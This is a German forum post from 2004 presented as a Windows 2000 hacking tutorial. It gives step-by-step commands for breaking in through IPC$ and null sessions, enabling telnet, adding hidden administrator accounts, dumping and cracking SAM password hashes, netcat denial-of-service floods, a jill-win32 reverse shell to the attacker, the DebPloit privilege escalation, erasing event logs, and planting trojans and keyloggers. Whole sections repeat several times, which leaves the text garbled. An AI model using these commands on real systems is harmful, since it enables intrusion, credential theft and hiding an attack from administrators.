HurricanX
14.08.2004, 12:27
/ \
| --------{ HaCkInG WiN2K }--------- |
| ~ made bai deez ~ |
| |
|________________________________-____________________________________| |
- |
| We work in the dark |
| We do what we can |
| We give what we have |
| Our doubt is our passion, and our passion is our task |
| The rest is the madness of art. |
| |
| -- Henry James |
\ /
{- zweiter teil -}
{erster teil}
[0] Allgemeines
[1] Architektur
(1) EFS d
(2) IPSec d
(3) ISA
(4) Authentifizierungsprotokolle d
(5) Kerberos d
(6) Logon Prozess
(7) LDAP
[2] Bugs
(1) bugs,bugs,bugs d
{zweiter teil}
[3] Angriffe
(1) Through IPC$ d
(2) Nullsessions d
(3) DoS d
(4) Passwoerter erhalten d
(5) Clearen
(6) Trojans & Backdoors
(7) Scanning d
Informationen zum Lesen dieses Textes befinden sich im ersten Teil.
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
[3] Angreifen
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
><<<<<<<<<< (1) Through IPC$ >>>>>>>>>><
1: Win2k System finden
2: Zu IPC$ connecten
3: Connecten und benutzen des CM
4: NTLM disabeln
5: Telnet Serive starten
6: User machen und diesen zu einer Gruppe zuweisen
7: Tracks covern
8: Wie schuetzt man davor
Was du brauchst:
Portscanner
NetBrute Scanner
PQWak
1: Scann nache einem Win2k System
Such nach 139 (Netbios) und 1025
Wenn ein System beide Ports offen hat, scan diese IP nach IPC$
2: Zu IPC$ connecten
Oeffne DOS
Schreib "net use \\ipadresse\ipc$ "" /user:administrator"
Bist du dran kommt die Meldung "Command was colpleted successfully"
Kommt das nicht wird sowas geschrieben: bad username or password. Versuch
PQWak zum laufen zu bringen und crack.
Das PW benutzt du dann so: net use \\ipaddress\ipc$ "password"
/user:administrator
3: ComMan zum Connecten benutzen
Oeffne Computer Mangament
Klick Action dann Connect to Another Computer
schreib die IP
4: NTLM disablen
Oeffne regedit geh zu
HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0—->NTLM
Setz den Wert von " auf 1.
5: Telnet starten
In Computer Managment gehste auf Services and Applications
click services
REchter Klick auf Telnet Services und oeffne Properties
Setz auf Automatic und start Servic
6:
Oeffne dos und schreib: telnet ipadress
wenn du gefragt wirst schreib administrator ohne Passwort
Um user zu adden schreib net user username password /add
Zur irgndner domain gehts so: Net localgroup administrators username /add Or
Net group administrators username /add
8 Wie schuetzen
Oeffne Regedit
Geh zu:
HKEY_LOCAL_MACHINE--System--CurrentControlSet--Control--Lsa-->restrictanonymous
Aender den Wert von 0 auf 1
Das wars, jetzt sollte kein remote logon ueber IPC$ funken.
......... (2) Nullsitzungen ...........
Fur eine Nullsitzung conectest du dich ueber IPC$ (sh IPC$) :
net use \\server\IPC$ "" /user:""
um diesen Angriff zu unterbinden brauch man nur den Registry Value "Restrict
Anonymous" auf 0 setze. Nicht das jetzt keine mehr moeglich sind, aber die
Angriffe verlieren ihre Wirkung.
()()()()()() Getting and Cracking the HaShs ()()()()()()()
Notwendig:
- DOS benutzen koennen
- John The Ripper
- pwdump2
Gut zu haben:
- L0pht Crack
Wie benutzt man Pwdump2
Pwdump is ein HaSh-hol Prog das in DOS laeuft. Die SAM ist von Win2000 schon
geschuetzt egal wie dumm der Admin ist und du kannst es auch nicht oeffnen
oder kopieren oder senden oder sonst was. pwdump is gut um die Hashes zu
bekommen.
Was jetzt kommt ist was du so in etwa tun solltest, wir nehmen an pwdumo2 is
auf c: alles laeuft (was du schon wissn muesttest) unter DOS
Gehen wir zum Ordner:
c:\cd pwdump2
Jetzt sind wir im Verzeichnis und geben <pwdump2> und sehen das
c:\pwdump2\pwdump2
Administrator:500:f22487de2f1sdaw0aad3b435b51404ee :d0c3985a7dsawq190d8b04c06
1c3e:::
Guest:501:aad3b435b51404eeaad3asdwb51404ee:31d6cfs daw16ae931b73c59d7e0c089c0
:::
HelpAssistant:1000:158dbeae7e5dasf9a2515e837c97827 :9cfec91asdwdb011860fa3816
6da9eaa1:::
You:1003:8c96188dd805daf3aaddas251404ee:96ce08a2c2 dsa0296c8e673506d763d9:::
Aber das sind keine aktuellen Hashes.
Na dann wir sehen im ersten Teil den Benutzernamen (Username)
Dann folgen die HaShes und noch ein paar Sachen (is komlett egal)
Jetzt speichern wir die SAM nach c: als textfile
c:\pwdump2\pwdump2 > c:\pass.txt
c:\pwdump2
Jetzt is er gespeichert und wir verwenden John the Ripper (JTR)
Einfuehrend: JTR wird in DOS verwendet, es ist ein Cracker der BruteForce
und Dictionary Attacks anwenden kann.
Jetzt zeig ich wie das geht:
c:\john.exe -i:all c:pass.txt
Loaded 3 passwords with no different salts <NT LM DES [24/32 4K]>
Die HaShes sind geladen und jetzt muessen wir sie cracken
Optionen dafuer
alle werden nur an john.exe drangehaengt
-i: das kann mit den naechsten in Verbindung genutzt werden
alpa nur Buchstaben
digits nur Zahlen
all Alle Zeichen
Bsp: c:\john.exe -i:digits c:pass.txt
Wenn du alle Options sehen willst schreib: john.exe ohne optionen oder
geladenene PWs
Was tust du mit L0pht Crack?
zum beispiel:
+ SMB capture (HaSh fangen)
+ Registry Dump (Hashes aus Reg)
+ und komplettes Nicht-da-sein; es kann komplett versteckt werden sodass es
weder am Desktop noch in der Taskleiste oder TaskManager.
alles das wirst du dir selbst beibringen; LC4 ist das (mir bekannte)
aktuellste.
..../~ (3) Denial of Service ~\....
IIP-Bug
°°°°°°°
Was du brauchst: netcat, jill-win32.exe
Start netcat und schreib: nc -vv -l -p 3003
vergiss die enter taste nicht
Fuehre jill-win32.exe so aus: jill-win32 opfer 80 angreifer 3003
Jetzt geht die Shell auf.
so was muesste kommen
listening on [any] 3003 ...
connect to [localhost] from opfer.lop
[#13]
Micro$oft Windows 2000 [Version blabla]
(C) Copyright 1985-1999 Micro$oft Corp.
c:\winnt\system32>
schreib weiter: whoami
und du erfaehrst welche Position du hast.
achja zu #13 - 13 entspricht carriage return-> enter taste
BInary Zero Attack
°°°°°°°°°°°°°°°°°°
Needed: netcat
Schickt man binaere Nullen von an einen offenen Port hat das eine
100prozentige Auslastung zu folge. Realisiert wird das mit netcat: nc
zielhost port < /dev/zero
Dieser Angriff hat Wirkung auf folgenden TCP Ports: 7 9 21 23 7778
und auf folgenden UDP Ports: 53 67 68 135 137 500 1812 1813 2535 3456
Bei UDP braucht es in netcat das -u
Ueber SMB
°°°°°°°°°
Sende SMB Anfragen auf 445 oder 139 und bestaetige die Antwort NICHT. Jetzt
liegen alle SMB Services fuer ca 20 Sekunden lahm
EFS nutzen
°°°°°°°°°°
Wenn du autoexex.bat mit EFS verschluesselt ist es lokal unmoeglich sich
anzumelden. Warum? Lies dir den Abschnitt Architektur durch.
::.. (4) Passwoerter erhalten ...::
HaShs
°°°°°
Notwendig:
- DOS benutzen koennen
- John The Ripper
- pwdump2
Gut zu haben:
- L0pht Crack
Wie benutzt man Pwdump2?
Pwdump is ein HaSh-hol Prog das in DOS laeuft. Die SAM ist von Win2000 schon
geschuetzt egal wie dumm der Admin ist und du kannst es auch nicht oeffnen
oder kopieren oder senden oder sonst was. pwdump is gut um die Hashes zu
bekommen.
Was jetzt kommt ist was du so in etwa tun solltest, wir nehmen an pwdump2 is
auf c: alles laeuft (was du schon wissn muesttest) unter DOS
Gehen wir zum Ordner:
c:\cd pwdump2
Jetzt sind wir im Verzeichnis und geben <pwdump2> und sehen das
c:\pwdump2\pwdump2
Administrator:500:f22487de2f1sdaw0aad3b435b51404ee :d0c3985a7dsawq190d8b04c06
1c3e:::
Guest:501:aad3b435b51404eeaad3asdwb51404ee:31d6cfs daw16ae931b73c59d7e0c089c0
:::
HelpAssistant:1000:158dbeae7e5dasf9a2515e837c97827 :9cfec91asdwdb011860fa3816
6da9eaa1:::
You:1003:8c96188dd805daf3aaddas251404ee:96ce08a2c2 dsa0296c8e673506d763d9:::
Aber das sind keine aktuellen Hashes.
Na dann wir sehen im ersten Teil den Benutzernamen (Username)
Dann folgen die HaShes und noch ein paar Sachen (is komlett egal)
Jetzt speichern wir die SAM nach c: als textfile
c:\pwdump2\pwdump2 > c:\pass.txt
c:\pwdump2
Jetzt is er gespeichert und wir verwenden John the Ripper (JTR)
Einfuehrend: JTR wird in DOS verwendet, es ist ein Cracker der BruteForce
und Dictionary Attacks anwenden kann.
Jetzt zeig ich wie das geht:
c:\john.exe -i:all c:pass.txt
Loaded 3 passwords with no different salts <NT LM DES [24/32 4K]>
Die HaShes sind geladen und jetzt muessen wir sie cracken
Optionen dafuer
alle werden nur an john.exe drangehaengt
-i: das kann mit den naechsten in Verbindung genutzt werden
alpa nur Buchstaben
digits nur Zahlen
all Alle Zeichen
Bsp: c:\john.exe -i:digits c:pass.txt
Wenn du alle Options sehen willst schreib: john.exe ohne optionen oder
geladenene PWs
Was tust du mit L0pht Crack?
zum beispiel:
+ SMB capture (HaSh fangen)
+ Registry Dump (Hashes aus Reg)
+ und komplettes Nicht-da-sein; es kann komplett versteckt werden sodass es
weder am Desktop noch in der Taskleiste oder TaskManager.
alles das wirst du dir selbst beibringen; LC4 ist das (mir bekannte)
aktuellste.
Direkt an die SAM
°°°°°°°°°°°°°°°°°
Die SAM (Security Account Manager) File liegt immer noch \system32\config
und eine Kopie unter \repair
L0pht Crack ist nur noch brauchbar wenn es bei einem NT System in einem
win2k Netzwerk liegt. Also die Sicherheit wird durch NT heruntergezogen.
einige der folgenden Methoden brauchen zwei Sachen: das Wissen eine autorun
cd zu erstellen und die Moeglichkeit von einer Diskette oder CD zu booten,
was (meist) soviel heist wie das BIOS zu veraendern (hack dich rein, na
los!).
weiter im text:
Ist FAT32 installiert (selten) kannst du die SAM loeschen und dich als Admin
anmelden. (Benutzer Administrator Kennwort: )
sei dir sicher das es installiert ist, sonst haste Bluescreens.
Benutz zum Beispiel Tools (CIA) und boot von der Floppy oder CD. Du kannst
alles alles erhalten (ich meine alles!)
Tools benutzen sollte immer die letzte Moeglichkeit sein.
DebPloit
°°°°°°°°
Ein Programm namens DebPloit soll ermoeglichen Adminrechte zu erhalten.
Von mir uebersetzte Anleitung dazu:
1. Werd dbgss client (DbgUiConnectToDbg).
2. Verbinde zu DbgSsApiPort Local Procedure Call (LPC) port (ZwConnectPort).
Jeder kann diesen Port oeffnen.
3. Frag dbgss to hadle CreateProcess SsApi mit der id des ziel clienten
4. Wart auf dbgss
Ask the debugging subsystem (smss.exe) to duplicate a handle to Target (any
process running on the local computer):
1. Become dbgss client (DbgUiConnectToDbg).
2. Connect to the DbgSsApiPort Local Procedure Call (LPC) port
(ZwConnectPort). Everyone can access this port.
3. Ask dbgss to handle CreateProcess SsApi with Target's client id
(ZwRequestPort).
4. Wait for dbgss to reply with CREATE_PROCESS_DEBUG_EVENT
(WaitForDebugEvent). Message contains a duplicated handle.
5. Impersonate your security context using a duplicated handle.
6. Execute any code (e.g. run an external program) in the security context
of Target.
Download DebPloit with a source code from:
http://www.anticracking.sk/EliCZ/bugs/DebPloit.zip
To test your system for this vulnerability:
1. Download DebPloit.zip and unzip it to the directory on your hard drive.
2. Logoff and login again using Guest (or any other non-administrative
account) account.
3. Run ERunAsX.exe from the command line and specify a program you wish to
execute under the SYSTEM account (e.g. "ERunAsX.exe cmd").
4. Your program now runs under the SYSTEM account and you can do everything
(e.g. create new user with an administrative privileges) on the local
computer.
Hotfix:
To close this hole and protect your computers and network against attacks
from the inside, you can use an unofficial Hotfix released by SmartLine,
Inc.
DebPloitFix is a Hotfix that closes the security hole using by the DebPloit
exploit. DebPloitFix is implemented as a kernel mode driver that can be run
dynamically (no need to restart your system). DebPloitFix assigns the new
security descriptor to the DbgSsApiPort LPC port so only the local system
(SYSTEM user) will be able to access this port.
+-+-+-+-+ (8) Scanning +-+-+-+-+
Bei TCP-Portscans tauchen folgende auf (in numerischer Reihenfolge):
88 Kerberos
389 LDAP
445 MS DS
464 LDAP
593 "
636 "
3268 Global Katalog
3269 "
3372 "
6586 "
wobei die Global Katalog sehr selten auftaucht.
..../~ (3) Denial of Service ~\....
IIP-Bug
°°°°°°°
Was du brauchst: netcat, jill-win32.exe
Start netcat und schreib: nc -vv -l -p 3003
vergiss die enter taste nicht
Fuehre jill-win32.exe so aus: jill-win32 opfer 80 angreifer 3003
Jetzt geht die Shell auf.
so was muesste kommen
listening on [any] 3003 ...
connect to [localhost] from opfer.lop
[#13]
Micro$oft Windows 2000 [Version blabla]
(C) Copyright 1985-1999 Micro$oft Corp.
c:\winnt\system32>
schreib weiter: whoami
und du erfaehrst welche Position du hast.
achja zu #13 - 13 entspricht carriage return-> enter taste
BInary Zero Attack
°°°°°°°°°°°°°°°°°°
Needed: netcat
Schickt man binaere Nullen von an einen offenen Port hat das eine
100prozentige Auslastung zu folge. Realisiert wird das mit netcat: nc
zielhost port < /dev/zero
Dieser Angriff hat Wirkung auf folgenden TCP Ports: 7 9 21 23 7778
und auf folgenden UDP Ports: 53 67 68 135 137 500 1812 1813 2535 3456
Bei UDP braucht es in netcat das -u
Ueber SMB
°°°°°°°°°
Sende SMB Anfragen auf 445 oder 139 und bestaetige die Antwort NICHT. Jetzt
liegen alle SMB Services fuer ca 20 Sekunden lahm
EFS nutzen
°°°°°°°°°°
Wenn du autoexex.bat mit EFS verschluesselt ist es lokal unmoeglich sich
anzumelden. Warum? Lies dir den Abschnitt Architektur durch.
::.. (4) Passwoerter erhalten ...::
HaShs
°°°°°
Notwendig:
- DOS benutzen koennen
- John The Ripper
- pwdump2
Gut zu haben:
- L0pht Crack
Wie benutzt man Pwdump2?
Pwdump is ein HaSh-hol Prog das in DOS laeuft. Die SAM ist von Win2000 schon
geschuetzt egal wie dumm der Admin ist und du kannst es auch nicht oeffnen
oder kopieren oder senden oder sonst was. pwdump is gut um die Hashes zu
bekommen.
Was jetzt kommt ist was du so in etwa tun solltest, wir nehmen an pwdump2 is
auf c: alles laeuft (was du schon wissn muesttest) unter DOS
Gehen wir zum Ordner:
c:\cd pwdump2
Jetzt sind wir im Verzeichnis und geben <pwdump2> und sehen das
c:\pwdump2\pwdump2
Administrator:500:f22487de2f1sdaw0aad3b435b51404ee :d0c3985a7dsawq190d8b04c06
1c3e:::
Guest:501:aad3b435b51404eeaad3asdwb51404ee:31d6cfs daw16ae931b73c59d7e0c089c0
:::
HelpAssistant:1000:158dbeae7e5dasf9a2515e837c97827 :9cfec91asdwdb011860fa3816
6da9eaa1:::
You:1003:8c96188dd805daf3aaddas251404ee:96ce08a2c2 dsa0296c8e673506d763d9:::
Aber das sind keine aktuellen Hashes.
Na dann wir sehen im ersten Teil den Benutzernamen (Username)
Dann folgen die HaShes und noch ein paar Sachen (is komlett egal)
Jetzt speichern wir die SAM nach c: als textfile
c:\pwdump2\pwdump2 > c:\pass.txt
c:\pwdump2
Jetzt is er gespeichert und wir verwenden John the Ripper (JTR)
Einfuehrend: JTR wird in DOS verwendet, es ist ein Cracker der BruteForce
und Dictionary Attacks anwenden kann.
Jetzt zeig ich wie das geht:
c:\john.exe -i:all c:pass.txt
Loaded 3 passwords with no different salts <NT LM DES [24/32 4K]>
Die HaShes sind geladen und jetzt muessen wir sie cracken
Optionen dafuer
alle werden nur an john.exe drangehaengt
-i: das kann mit den naechsten in Verbindung genutzt werden
alpa nur Buchstaben
digits nur Zahlen
all Alle Zeichen
Bsp: c:\john.exe -i:digits c:pass.txt
Wenn du alle Options sehen willst schreib: john.exe ohne optionen oder
geladenene PWs
Was tust du mit L0pht Crack?
zum beispiel:
+ SMB capture (HaSh fangen)
+ Registry Dump (Hashes aus Reg)
+ und komplettes Nicht-da-sein; es kann komplett versteckt werden sodass es
weder am Desktop noch in der Taskleiste oder TaskManager.
alles das wirst du dir selbst beibringen; LC4 ist das (mir bekannte)
aktuellste.
Direkt an die SAM
°°°°°°°°°°°°°°°°°
Die SAM (Security Account Manager) File liegt immer noch \system32\config
und eine Kopie unter \repair
L0pht Crack ist nur noch brauchbar wenn es bei einem NT System in einem
win2k Netzwerk liegt. Also die Sicherheit wird durch NT heruntergezogen.
einige der folgenden Methoden brauchen zwei Sachen: das Wissen eine autorun
cd zu erstellen und die Moeglichkeit von einer Diskette oder CD zu booten,
was (meist) soviel heist wie das BIOS zu veraendern (hack dich rein, na
los!).
weiter im text:
Ist FAT32 installiert (selten) kannst du die SAM loeschen und dich als Admin
anmelden. (Benutzer Administrator Kennwort: )
sei dir sicher das es installiert ist, sonst haste Bluescreens.
Benutz zum Beispiel Tools (CIA) und boot von der Floppy oder CD. Du kannst
alles alles erhalten (ich meine alles!)
Tools benutzen sollte immer die letzte Moeglichkeit sein.
DebPloit
°°°°°°°°
Ein Programm namens DebPloit soll ermoeglichen Adminrechte zu erhalten.
Von mir uebersetzte Anleitung dazu:
1. Werd dbgss client (DbgUiConnectToDbg).
2. Verbinde zu DbgSsApiPort Local Procedure Call (LPC) port (ZwConnectPort).
Jeder kann diesen Port oeffnen.
3. Frag dbgss to hadle CreateProcess SsApi mit der id des ziel clienten
4. Wart auf dbgss
Ask the debugging subsystem (smss.exe) to duplicate a handle to Target (any
process running on the local computer):
1. Become dbgss client (DbgUiConnectToDbg).
2. Connect to the DbgSsApiPort Local Procedure Call (LPC) port
(ZwConnectPort). Everyone can access this port.
3. Ask dbgss to handle CreateProcess SsApi with Target's client id
(ZwRequestPort).
4. Wait for dbgss to reply with CREATE_PROCESS_DEBUG_EVENT
(WaitForDebugEvent). Message contains a duplicated handle.
5. Impersonate your security context using a duplicated handle.
6. Execute any code (e.g. run an external program) in the security context
of Target.
Download DebPloit with a source code from:
http://www.anticracking.sk/EliCZ/bugs/DebPloit.zip
To test your system for this vulnerability:
1. Download DebPloit.zip and unzip it to the directory on your hard drive.
2. Logoff and login again using Guest (or any other non-administrative
account) account.
3. Run ERunAsX.exe from the command line and specify a program you wish to
execute under the SYSTEM account (e.g. "ERunAsX.exe cmd").
4. Your program now runs under the SYSTEM account and you can do everything
(e.g. create new user with an administrative privileges) on the local
computer.
Hotfix:
To close this hole and protect your computers and network against attacks
from the inside, you can use an unofficial Hotfix released by SmartLine,
Inc.
DebPloitFix is a Hotfix that closes the security hole using by the DebPloit
exploit. DebPloitFix is implemented as a kernel mode driver that can be run
dynamically (no need to restart your system). DebPloitFix assigns the new
security descriptor to the DbgSsApiPort LPC port so only the local system
(SYSTEM user) will be able to access this port.
&&&&&&&&&&&6 (5) Clearing 6&&&&&&&&&&&&
Datein auf einem System zu speichern ist immer riskant, merk dir das. Aber
es ist manchmal notwendig. Mach das mit dem cp Utility, nich mit der Hide
Option, das kennt mittlerweile jader.
Alle Protokolle werden lokal gespeichert und deshalb kannst du die Revision
über MMC-Snap-In für Gruppenrichtlinien unter %Computerverwaltung\Windows-
Einstellungen\Sicherheitseinstellungen\Lokale Richtlinie\Richtlinie
überwachen
Ich weis nicht wie das in Englisch heisst. Schreibts mir wenn moeglich.
Mit ein wenig denken kannst du auch andere Protokolle loeschen: sie sind
alle unter %Systemwerkzeuge\Ereignisanzeige
<+++++ (6) Trojans & Backdoors ++++++>
Das tollste ist ja wenn man an System immer rankommt weil man eine Backdoor
hat, find ich.
NetBus, BO2000, WinVNC, IKS (Invisible Keylogger Stealth) funktionieren
ausgezeichnet.
Du kannst sie unterbringen in dem du den Relative Shell Path Bug ausnutzt,
hab ich aber noch nie getan. Autostart ging immer gut.
+-+-+-+-+ (8) Scanning +-+-+-+-+
Bei TCP-Portscans tauchen folgende auf (in numerischer Reihenfolge):
88 Kerberos
389 LDAP
445 MS DS
464 LDAP
593 "
636 "
3268 Global Katalog
3269 "
3372 "
6586 "
wobei die Global Katalog sehr selten auftaucht.
__________________________________________________ ____________________________________________
Danke und Entschuldigung an all jene denen ich ohne einverstaendnis
Textinhalte oder Ideen "gestohlen" habe:
+ Marco Ruef
+ Prof. Wiesner
+ -=Moses=-
+ Andrea Pinzani
+ LLNK
+ Der Typ der die .doc file sicherheit_windows_2000
+ allen rootboardern
+ Manweis Janie
indirekt beigetragen:
+ The Doors
+ Marylin Monroe
+ Jim Jarmusch
wenn ihr nicht verstanden habt dann lest euch alles noch mal durch dann seid
ihr wieder am:
*E*O*F*
| --------{ HaCkInG WiN2K }--------- |
| ~ made bai deez ~ |
| |
|________________________________-____________________________________| |
- |
| We work in the dark |
| We do what we can |
| We give what we have |
| Our doubt is our passion, and our passion is our task |
| The rest is the madness of art. |
| |
| -- Henry James |
\ /
{- zweiter teil -}
{erster teil}
[0] Allgemeines
[1] Architektur
(1) EFS d
(2) IPSec d
(3) ISA
(4) Authentifizierungsprotokolle d
(5) Kerberos d
(6) Logon Prozess
(7) LDAP
[2] Bugs
(1) bugs,bugs,bugs d
{zweiter teil}
[3] Angriffe
(1) Through IPC$ d
(2) Nullsessions d
(3) DoS d
(4) Passwoerter erhalten d
(5) Clearen
(6) Trojans & Backdoors
(7) Scanning d
Informationen zum Lesen dieses Textes befinden sich im ersten Teil.
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
[3] Angreifen
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
><<<<<<<<<< (1) Through IPC$ >>>>>>>>>><
1: Win2k System finden
2: Zu IPC$ connecten
3: Connecten und benutzen des CM
4: NTLM disabeln
5: Telnet Serive starten
6: User machen und diesen zu einer Gruppe zuweisen
7: Tracks covern
8: Wie schuetzt man davor
Was du brauchst:
Portscanner
NetBrute Scanner
PQWak
1: Scann nache einem Win2k System
Such nach 139 (Netbios) und 1025
Wenn ein System beide Ports offen hat, scan diese IP nach IPC$
2: Zu IPC$ connecten
Oeffne DOS
Schreib "net use \\ipadresse\ipc$ "" /user:administrator"
Bist du dran kommt die Meldung "Command was colpleted successfully"
Kommt das nicht wird sowas geschrieben: bad username or password. Versuch
PQWak zum laufen zu bringen und crack.
Das PW benutzt du dann so: net use \\ipaddress\ipc$ "password"
/user:administrator
3: ComMan zum Connecten benutzen
Oeffne Computer Mangament
Klick Action dann Connect to Another Computer
schreib die IP
4: NTLM disablen
Oeffne regedit geh zu
HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0—->NTLM
Setz den Wert von " auf 1.
5: Telnet starten
In Computer Managment gehste auf Services and Applications
click services
REchter Klick auf Telnet Services und oeffne Properties
Setz auf Automatic und start Servic
6:
Oeffne dos und schreib: telnet ipadress
wenn du gefragt wirst schreib administrator ohne Passwort
Um user zu adden schreib net user username password /add
Zur irgndner domain gehts so: Net localgroup administrators username /add Or
Net group administrators username /add
8 Wie schuetzen
Oeffne Regedit
Geh zu:
HKEY_LOCAL_MACHINE--System--CurrentControlSet--Control--Lsa-->restrictanonymous
Aender den Wert von 0 auf 1
Das wars, jetzt sollte kein remote logon ueber IPC$ funken.
......... (2) Nullsitzungen ...........
Fur eine Nullsitzung conectest du dich ueber IPC$ (sh IPC$) :
net use \\server\IPC$ "" /user:""
um diesen Angriff zu unterbinden brauch man nur den Registry Value "Restrict
Anonymous" auf 0 setze. Nicht das jetzt keine mehr moeglich sind, aber die
Angriffe verlieren ihre Wirkung.
()()()()()() Getting and Cracking the HaShs ()()()()()()()
Notwendig:
- DOS benutzen koennen
- John The Ripper
- pwdump2
Gut zu haben:
- L0pht Crack
Wie benutzt man Pwdump2
Pwdump is ein HaSh-hol Prog das in DOS laeuft. Die SAM ist von Win2000 schon
geschuetzt egal wie dumm der Admin ist und du kannst es auch nicht oeffnen
oder kopieren oder senden oder sonst was. pwdump is gut um die Hashes zu
bekommen.
Was jetzt kommt ist was du so in etwa tun solltest, wir nehmen an pwdumo2 is
auf c: alles laeuft (was du schon wissn muesttest) unter DOS
Gehen wir zum Ordner:
c:\cd pwdump2
Jetzt sind wir im Verzeichnis und geben <pwdump2> und sehen das
c:\pwdump2\pwdump2
Administrator:500:f22487de2f1sdaw0aad3b435b51404ee :d0c3985a7dsawq190d8b04c06
1c3e:::
Guest:501:aad3b435b51404eeaad3asdwb51404ee:31d6cfs daw16ae931b73c59d7e0c089c0
:::
HelpAssistant:1000:158dbeae7e5dasf9a2515e837c97827 :9cfec91asdwdb011860fa3816
6da9eaa1:::
You:1003:8c96188dd805daf3aaddas251404ee:96ce08a2c2 dsa0296c8e673506d763d9:::
Aber das sind keine aktuellen Hashes.
Na dann wir sehen im ersten Teil den Benutzernamen (Username)
Dann folgen die HaShes und noch ein paar Sachen (is komlett egal)
Jetzt speichern wir die SAM nach c: als textfile
c:\pwdump2\pwdump2 > c:\pass.txt
c:\pwdump2
Jetzt is er gespeichert und wir verwenden John the Ripper (JTR)
Einfuehrend: JTR wird in DOS verwendet, es ist ein Cracker der BruteForce
und Dictionary Attacks anwenden kann.
Jetzt zeig ich wie das geht:
c:\john.exe -i:all c:pass.txt
Loaded 3 passwords with no different salts <NT LM DES [24/32 4K]>
Die HaShes sind geladen und jetzt muessen wir sie cracken
Optionen dafuer
alle werden nur an john.exe drangehaengt
-i: das kann mit den naechsten in Verbindung genutzt werden
alpa nur Buchstaben
digits nur Zahlen
all Alle Zeichen
Bsp: c:\john.exe -i:digits c:pass.txt
Wenn du alle Options sehen willst schreib: john.exe ohne optionen oder
geladenene PWs
Was tust du mit L0pht Crack?
zum beispiel:
+ SMB capture (HaSh fangen)
+ Registry Dump (Hashes aus Reg)
+ und komplettes Nicht-da-sein; es kann komplett versteckt werden sodass es
weder am Desktop noch in der Taskleiste oder TaskManager.
alles das wirst du dir selbst beibringen; LC4 ist das (mir bekannte)
aktuellste.
..../~ (3) Denial of Service ~\....
IIP-Bug
°°°°°°°
Was du brauchst: netcat, jill-win32.exe
Start netcat und schreib: nc -vv -l -p 3003
vergiss die enter taste nicht
Fuehre jill-win32.exe so aus: jill-win32 opfer 80 angreifer 3003
Jetzt geht die Shell auf.
so was muesste kommen
listening on [any] 3003 ...
connect to [localhost] from opfer.lop
[#13]
Micro$oft Windows 2000 [Version blabla]
(C) Copyright 1985-1999 Micro$oft Corp.
c:\winnt\system32>
schreib weiter: whoami
und du erfaehrst welche Position du hast.
achja zu #13 - 13 entspricht carriage return-> enter taste
BInary Zero Attack
°°°°°°°°°°°°°°°°°°
Needed: netcat
Schickt man binaere Nullen von an einen offenen Port hat das eine
100prozentige Auslastung zu folge. Realisiert wird das mit netcat: nc
zielhost port < /dev/zero
Dieser Angriff hat Wirkung auf folgenden TCP Ports: 7 9 21 23 7778
und auf folgenden UDP Ports: 53 67 68 135 137 500 1812 1813 2535 3456
Bei UDP braucht es in netcat das -u
Ueber SMB
°°°°°°°°°
Sende SMB Anfragen auf 445 oder 139 und bestaetige die Antwort NICHT. Jetzt
liegen alle SMB Services fuer ca 20 Sekunden lahm
EFS nutzen
°°°°°°°°°°
Wenn du autoexex.bat mit EFS verschluesselt ist es lokal unmoeglich sich
anzumelden. Warum? Lies dir den Abschnitt Architektur durch.
::.. (4) Passwoerter erhalten ...::
HaShs
°°°°°
Notwendig:
- DOS benutzen koennen
- John The Ripper
- pwdump2
Gut zu haben:
- L0pht Crack
Wie benutzt man Pwdump2?
Pwdump is ein HaSh-hol Prog das in DOS laeuft. Die SAM ist von Win2000 schon
geschuetzt egal wie dumm der Admin ist und du kannst es auch nicht oeffnen
oder kopieren oder senden oder sonst was. pwdump is gut um die Hashes zu
bekommen.
Was jetzt kommt ist was du so in etwa tun solltest, wir nehmen an pwdump2 is
auf c: alles laeuft (was du schon wissn muesttest) unter DOS
Gehen wir zum Ordner:
c:\cd pwdump2
Jetzt sind wir im Verzeichnis und geben <pwdump2> und sehen das
c:\pwdump2\pwdump2
Administrator:500:f22487de2f1sdaw0aad3b435b51404ee :d0c3985a7dsawq190d8b04c06
1c3e:::
Guest:501:aad3b435b51404eeaad3asdwb51404ee:31d6cfs daw16ae931b73c59d7e0c089c0
:::
HelpAssistant:1000:158dbeae7e5dasf9a2515e837c97827 :9cfec91asdwdb011860fa3816
6da9eaa1:::
You:1003:8c96188dd805daf3aaddas251404ee:96ce08a2c2 dsa0296c8e673506d763d9:::
Aber das sind keine aktuellen Hashes.
Na dann wir sehen im ersten Teil den Benutzernamen (Username)
Dann folgen die HaShes und noch ein paar Sachen (is komlett egal)
Jetzt speichern wir die SAM nach c: als textfile
c:\pwdump2\pwdump2 > c:\pass.txt
c:\pwdump2
Jetzt is er gespeichert und wir verwenden John the Ripper (JTR)
Einfuehrend: JTR wird in DOS verwendet, es ist ein Cracker der BruteForce
und Dictionary Attacks anwenden kann.
Jetzt zeig ich wie das geht:
c:\john.exe -i:all c:pass.txt
Loaded 3 passwords with no different salts <NT LM DES [24/32 4K]>
Die HaShes sind geladen und jetzt muessen wir sie cracken
Optionen dafuer
alle werden nur an john.exe drangehaengt
-i: das kann mit den naechsten in Verbindung genutzt werden
alpa nur Buchstaben
digits nur Zahlen
all Alle Zeichen
Bsp: c:\john.exe -i:digits c:pass.txt
Wenn du alle Options sehen willst schreib: john.exe ohne optionen oder
geladenene PWs
Was tust du mit L0pht Crack?
zum beispiel:
+ SMB capture (HaSh fangen)
+ Registry Dump (Hashes aus Reg)
+ und komplettes Nicht-da-sein; es kann komplett versteckt werden sodass es
weder am Desktop noch in der Taskleiste oder TaskManager.
alles das wirst du dir selbst beibringen; LC4 ist das (mir bekannte)
aktuellste.
Direkt an die SAM
°°°°°°°°°°°°°°°°°
Die SAM (Security Account Manager) File liegt immer noch \system32\config
und eine Kopie unter \repair
L0pht Crack ist nur noch brauchbar wenn es bei einem NT System in einem
win2k Netzwerk liegt. Also die Sicherheit wird durch NT heruntergezogen.
einige der folgenden Methoden brauchen zwei Sachen: das Wissen eine autorun
cd zu erstellen und die Moeglichkeit von einer Diskette oder CD zu booten,
was (meist) soviel heist wie das BIOS zu veraendern (hack dich rein, na
los!).
weiter im text:
